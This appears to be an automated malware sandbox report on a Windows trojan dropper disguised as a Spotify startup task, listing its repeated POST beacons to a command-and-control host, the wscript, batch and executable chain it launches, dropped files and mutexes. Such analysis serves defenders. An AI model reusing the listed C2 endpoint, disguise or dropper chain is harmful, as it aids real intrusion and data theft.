Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1292Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1264Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1292Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1292Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1008Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1292Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: 517300cm.renyash.ru

Source: unknown

HTTP traffic detected: POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 517300cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://517300cm.rePR
Source: WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.0000000002A77000.00000004.00000800.00020000.00000000.sdmp, WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.0000000002C0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://517300cm.renyash.ru
Source: WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.00000000028A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://517300cm.renyash.ru/
Source: WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.0000000002A77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://517300cm.renyash.ru/pipeJavascriptDefaulttrafficWp.php
Source: MsAgentDriverruntime.exe, 00000004.00000002.1773406022.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, WBnjVTGHzbhirvM.exe, 0000000B.00000002.2913344594.00000000028A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe

Code function: 0_2_00346FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00346FAA

Source: C:\winRefruntime\MsAgentDriverruntime.exe	File created: C:\Windows\PLA\Templates\WBnjVTGHzbhirvM.exe			Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File created: C:\Windows\PLA\Templates\2f08a7aa5b4dd8			Jump to behavior

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_0034848E	0_2_0034848E
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_003500B7	0_2_003500B7
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_00354088	0_2_00354088
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_003440FE	0_2_003440FE
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_00357153	0_2_00357153
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_003651C9	0_2_003651C9
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_003432F7	0_2_003432F7
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_003562CA	0_2_003562CA
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_003543BF	0_2_003543BF
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_0034C426	0_2_0034C426
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_0034F461	0_2_0034F461
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_0036D440	0_2_0036D440
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_003577EF	0_2_003577EF
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_0034286B	0_2_0034286B
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_0036D8EE	0_2_0036D8EE
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_0034E9B7	0_2_0034E9B7
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_003719F4	0_2_003719F4
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_00356CDC	0_2_00356CDC
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_00353E0B	0_2_00353E0B
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_00364F9A	0_2_00364F9A
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_0034EFE2	0_2_0034EFE2
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Code function: 4_2_00007FFD9B750D78	4_2_00007FFD9B750D78
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Code function: 4_2_00007FFD9BB47BDD	4_2_00007FFD9BB47BDD
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Code function: 4_2_00007FFD9BB4590B	4_2_00007FFD9BB4590B
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Code function: 11_2_00007FFD9B780D78	11_2_00007FFD9B780D78
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Code function: 11_2_00007FFD9B8433E4	11_2_00007FFD9B8433E4
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Code function: 11_2_00007FFD9BB7E214	11_2_00007FFD9BB7E214
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Code function: 11_2_00007FFD9BB8051D	11_2_00007FFD9BB8051D
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Code function: 11_2_00007FFD9BB7590B	11_2_00007FFD9BB7590B
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Code function: 11_2_00007FFD9BB78D65	11_2_00007FFD9BB78D65

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\GWwNmKBL.log 7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: String function: 0035EC50 appears 56 times
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: String function: 0035F5F0 appears 31 times
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: String function: 0035EB78 appears 39 times

Source: PinddLxP.log.4.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: sbJHDJmG.log.4.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: hnfQTxsY.log.4.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: wJQffXMu.log.4.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: cZPJNcWU.log.11.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: GWwNmKBL.log.11.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: viSXCyGd.log.11.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: nFKhSFqw.log.11.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: 0V2JsCrGUB.exe

Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0V2JsCrGUB.exe

Source: 0V2JsCrGUB.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: MsAgentDriverruntime.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WBnjVTGHzbhirvM.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WBnjVTGHzbhirvM.exe0.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WmiPrvSE.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WBnjVTGHzbhirvM.exe1.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WBnjVTGHzbhirvM.exe2.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@18/26@1/1

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe

Code function: 0_2_00346C74 GetLastError,FormatMessageW,

0_2_00346C74

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe

Code function: 0_2_0035A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_0035A6C2

Source: C:\winRefruntime\MsAgentDriverruntime.exe

File created: C:\Users\user\Desktop\PinddLxP.log

Jump to behavior

Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-yT0wzpcF5lXdbguiJ4ea

Source: C:\winRefruntime\MsAgentDriverruntime.exe

File created: C:\Users\user\AppData\Local\Temp\1rr3mmHPcD

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\winRefruntime\T8Mz9n0cgvFWE.bat" "

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Command line argument: sfxname	0_2_0035DF1E
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Command line argument: sfxstime	0_2_0035DF1E
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Command line argument: STARTDLG	0_2_0035DF1E
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Command line argument: xz9	0_2_0035DF1E

Source: 0V2JsCrGUB.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0V2JsCrGUB.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 0V2JsCrGUB.exe

ReversingLabs: Detection: 71%

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe

File read: C:\Users\user\Desktop\0V2JsCrGUB.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\0V2JsCrGUB.exe "C:\Users\user\Desktop\0V2JsCrGUB.exe"
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\winRefruntime\0jfMNzpItgnyb3dolhtjTtJBeKE8V11tqFqpGcy14sQRgDlNdePdmeq.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\winRefruntime\T8Mz9n0cgvFWE.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\winRefruntime\MsAgentDriverruntime.exe "C:\winRefruntime/MsAgentDriverruntime.exe"
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ani1HH9Yqa.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\WBnjVTGHzbhirvM.exe "C:\Recovery\WBnjVTGHzbhirvM.exe"
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\winRefruntime\0jfMNzpItgnyb3dolhtjTtJBeKE8V11tqFqpGcy14sQRgDlNdePdmeq.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\winRefruntime\T8Mz9n0cgvFWE.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\winRefruntime\MsAgentDriverruntime.exe "C:\winRefruntime/MsAgentDriverruntime.exe"	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ani1HH9Yqa.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\WBnjVTGHzbhirvM.exe "C:\Recovery\WBnjVTGHzbhirvM.exe"	Jump to behavior

